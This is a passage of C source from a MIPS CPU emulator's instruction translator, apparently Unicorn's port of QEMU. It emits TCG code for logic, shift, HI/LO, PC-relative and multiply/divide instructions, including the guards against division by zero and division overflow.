TCG_COND_NE, tcg_ctx->cpu_gpr[rd], t0, t1, t2, t1); break; case OPC_SELEQZ: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[rd], t0, t1, t2, t1); break; } tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } /* Logic */ static void gen_logic(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rd == 0) { /* If no destination, treat it as a NOP. 
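 * The cases below also constant-fold reads of $zero rather than
 * loading it through gen_load_gpr.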
*/ return; } switch (opc) { case OPC_AND: if (likely(rs != 0 && rt != 0)) { tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_NOR: if (rs != 0 && rt != 0) { tcg_gen_nor_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], ~((target_ulong)0)); } break; case OPC_OR: if (likely(rs != 0 && rt != 0)) { tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_XOR: if (likely(rs != 0 && rt != 0)) { tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; } } /* Set on lower than */ static void gen_slt(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_SLT: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr[rd], t0, t1); break; case OPC_SLTU: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr[rd], t0, t1); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* Shifts */ static void gen_shift(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* * If no destination, treat it as a NOP. * For add & sub, we must generate the overflow exception when needed. 
*/ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_SLLV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); tcg_gen_shl_tl(tcg_ctx, t0, t1, t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; case OPC_SRAV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); tcg_gen_sar_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_SRLV: tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); tcg_gen_shr_tl(tcg_ctx, t0, t1, t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; case OPC_ROTRV: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0x1f); tcg_gen_rotr_i32(tcg_ctx, t2, t3, t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; #if defined(TARGET_MIPS64) case OPC_DSLLV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_DSRAV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_sar_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_DSRLV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_shr_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_DROTRV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_rotr_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #if defined(TARGET_MIPS64) /* Copy GPR to and from TX79 HI1/LO1 register. */ static void gen_HILO1_tx79(DisasContext *ctx, uint32_t opc, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (reg == 0 && (opc == MMI_OPC_MFHI1 || opc == MMI_OPC_MFLO1)) { /* Treat as NOP. */ return; } switch (opc) { case MMI_OPC_MFHI1: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_HI[1]); break; case MMI_OPC_MFLO1: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_LO[1]); break; case MMI_OPC_MTHI1: if (reg != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_HI[1], tcg_ctx->cpu_gpr[reg]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_HI[1], 0); } break; case MMI_OPC_MTLO1: if (reg != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_LO[1], tcg_ctx->cpu_gpr[reg]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_LO[1], 0); } break; default: MIPS_INVAL("mfthilo1 TX79"); generate_exception_end(ctx, EXCP_RI); break; } } #endif /* Arithmetic on HI/LO registers */ static void gen_HILO(DisasContext *ctx, uint32_t opc, int acc, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (reg == 0 && (opc == OPC_MFHI || opc == OPC_MFLO)) { /* Treat as NOP. 
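 * MFHI/MFLO with reg == 0 would only write the hardwired zero
 * register; MTHI/MTLO are still emitted because they modify HI/LO
 * rather than a GPR.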
*/ return; } if (acc != 0) { check_dsp(ctx); } switch (opc) { case OPC_MFHI: #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_HI[acc]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_HI[acc]); } break; case OPC_MFLO: #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_LO[acc]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_LO[acc]); } break; case OPC_MTHI: if (reg != 0) { #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_gpr[reg]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_gpr[reg]); } } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], 0); } break; case OPC_MTLO: if (reg != 0) { #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_gpr[reg]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_gpr[reg]); } } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], 0); } break; } } static inline void gen_r6_ld(TCGContext *tcg_ctx, target_long addr, int reg, int memidx, MemOp memop) { TCGv t0 = tcg_const_tl(tcg_ctx, addr); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, memidx, memop); gen_store_gpr(tcg_ctx, t0, reg); tcg_temp_free(tcg_ctx, t0); } static inline void gen_pcrel(DisasContext *ctx, int opc, target_ulong pc, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long offset; target_long addr; switch (MASK_OPC_PCREL_TOP2BITS(opc)) { case OPC_ADDIUPC: if (rs != 0) { offset = sextract32(ctx->opcode << 2, 0, 21); addr = addr_add(ctx, pc, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], addr); } break; case R6_OPC_LWPC: offset = sextract32(ctx->opcode << 2, 0, 21); addr = addr_add(ctx, pc, offset); gen_r6_ld(tcg_ctx, addr, rs, ctx->mem_idx, MO_TESL); break; #if defined(TARGET_MIPS64) case OPC_LWUPC: check_mips_64(ctx); offset = sextract32(ctx->opcode << 2, 0, 21); addr = addr_add(ctx, pc, offset); gen_r6_ld(tcg_ctx, addr, rs, ctx->mem_idx, MO_TEUL); break; #endif default: switch (MASK_OPC_PCREL_TOP5BITS(opc)) { case OPC_AUIPC: if (rs != 0) { offset = sextract32(ctx->opcode, 0, 16) << 16; addr = addr_add(ctx, pc, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], addr); } break; case OPC_ALUIPC: if (rs != 0) { offset = sextract32(ctx->opcode, 0, 16) << 16; addr = ~0xFFFF & addr_add(ctx, pc, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], addr); } break; #if defined(TARGET_MIPS64) case R6_OPC_LDPC: /* bits 16 and 17 are part of immediate */ case R6_OPC_LDPC + (1 << 16): case R6_OPC_LDPC + (2 << 16): case R6_OPC_LDPC + (3 << 16): check_mips_64(ctx); offset = sextract32(ctx->opcode << 3, 0, 21); addr = addr_add(ctx, (pc & ~0x7), offset); gen_r6_ld(tcg_ctx, addr, rs, ctx->mem_idx, MO_TEQ); break; #endif default: MIPS_INVAL("OPC_PCREL"); generate_exception_end(ctx, EXCP_RI); break; } break; } } static void gen_r6_muldiv(DisasContext *ctx, int opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* Treat as NOP. 
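 * Unlike the pre-R6 DIV/MULT family, the R6 forms write a GPR
 * instead of HI/LO, so rd == 0 has no architectural effect.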
*/ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case R6_OPC_DIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_MOD: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_MODU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_MUL: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case R6_OPC_MUH: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case R6_OPC_MULU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case R6_OPC_MUHU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); 
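/*
 * mulu2 below yields the full 64-bit unsigned product as two 32-bit
 * halves (t2 = low, t3 = high); MUHU keeps the high half,
 * sign-extended into rd.
 */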
tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; #if defined(TARGET_MIPS64) case R6_OPC_DDIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1LL << 63); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMOD: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1LL << 63); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DDIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMODU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_remu_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMUL: tcg_gen_mul_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case R6_OPC_DMUH: { TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_muls2_i64(tcg_ctx, t2, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMULU: tcg_gen_mul_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case R6_OPC_DMUHU: { TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_mulu2_i64(tcg_ctx, t2, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); } break; #endif default: MIPS_INVAL("r6 mul/div"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #if defined(TARGET_MIPS64) static void gen_div1_tx79(DisasContext *ctx, uint32_t opc, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case MMI_OPC_DIV1: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_LO[1], t0, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_HI[1], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[1], tcg_ctx->cpu_LO[1]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[1], tcg_ctx->cpu_HI[1]); 
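/*
 * LO1/HI1 receive the 32-bit quotient and remainder; on this 64-bit
 * target they are kept in canonical sign-extended form, hence the
 * two ext32s operations above.
 */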
tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case MMI_OPC_DIVU1: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_LO[1], t0, t1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_HI[1], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[1], tcg_ctx->cpu_LO[1]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[1], tcg_ctx->cpu_HI[1]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; default: MIPS_INVAL("div1 TX79"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #endif static void gen_muldiv(DisasContext *ctx, uint32_t opc, int acc, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); if (acc != 0) { check_dsp(ctx); } switch (opc) { case OPC_DIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_LO[acc]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_HI[acc]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_DIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_LO[acc]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_HI[acc]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_MULT: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case OPC_MULTU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; #if defined(TARGET_MIPS64) case OPC_DDIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1LL << 63); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); 
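/*
 * t2 is 1 for the INT64_MIN / -1 overflow case and t3 for a zero
 * divisor; the movcond below substitutes divisor 1 in either case,
 * since MIPS leaves LO/HI UNPREDICTABLE for these operands and the
 * host divide must not trap.
 */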
tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_DDIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_i64(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_remu_i64(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case OPC_DMULT: tcg_gen_muls2_i64(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_HI[acc], t0, t1); break; case OPC_DMULTU: 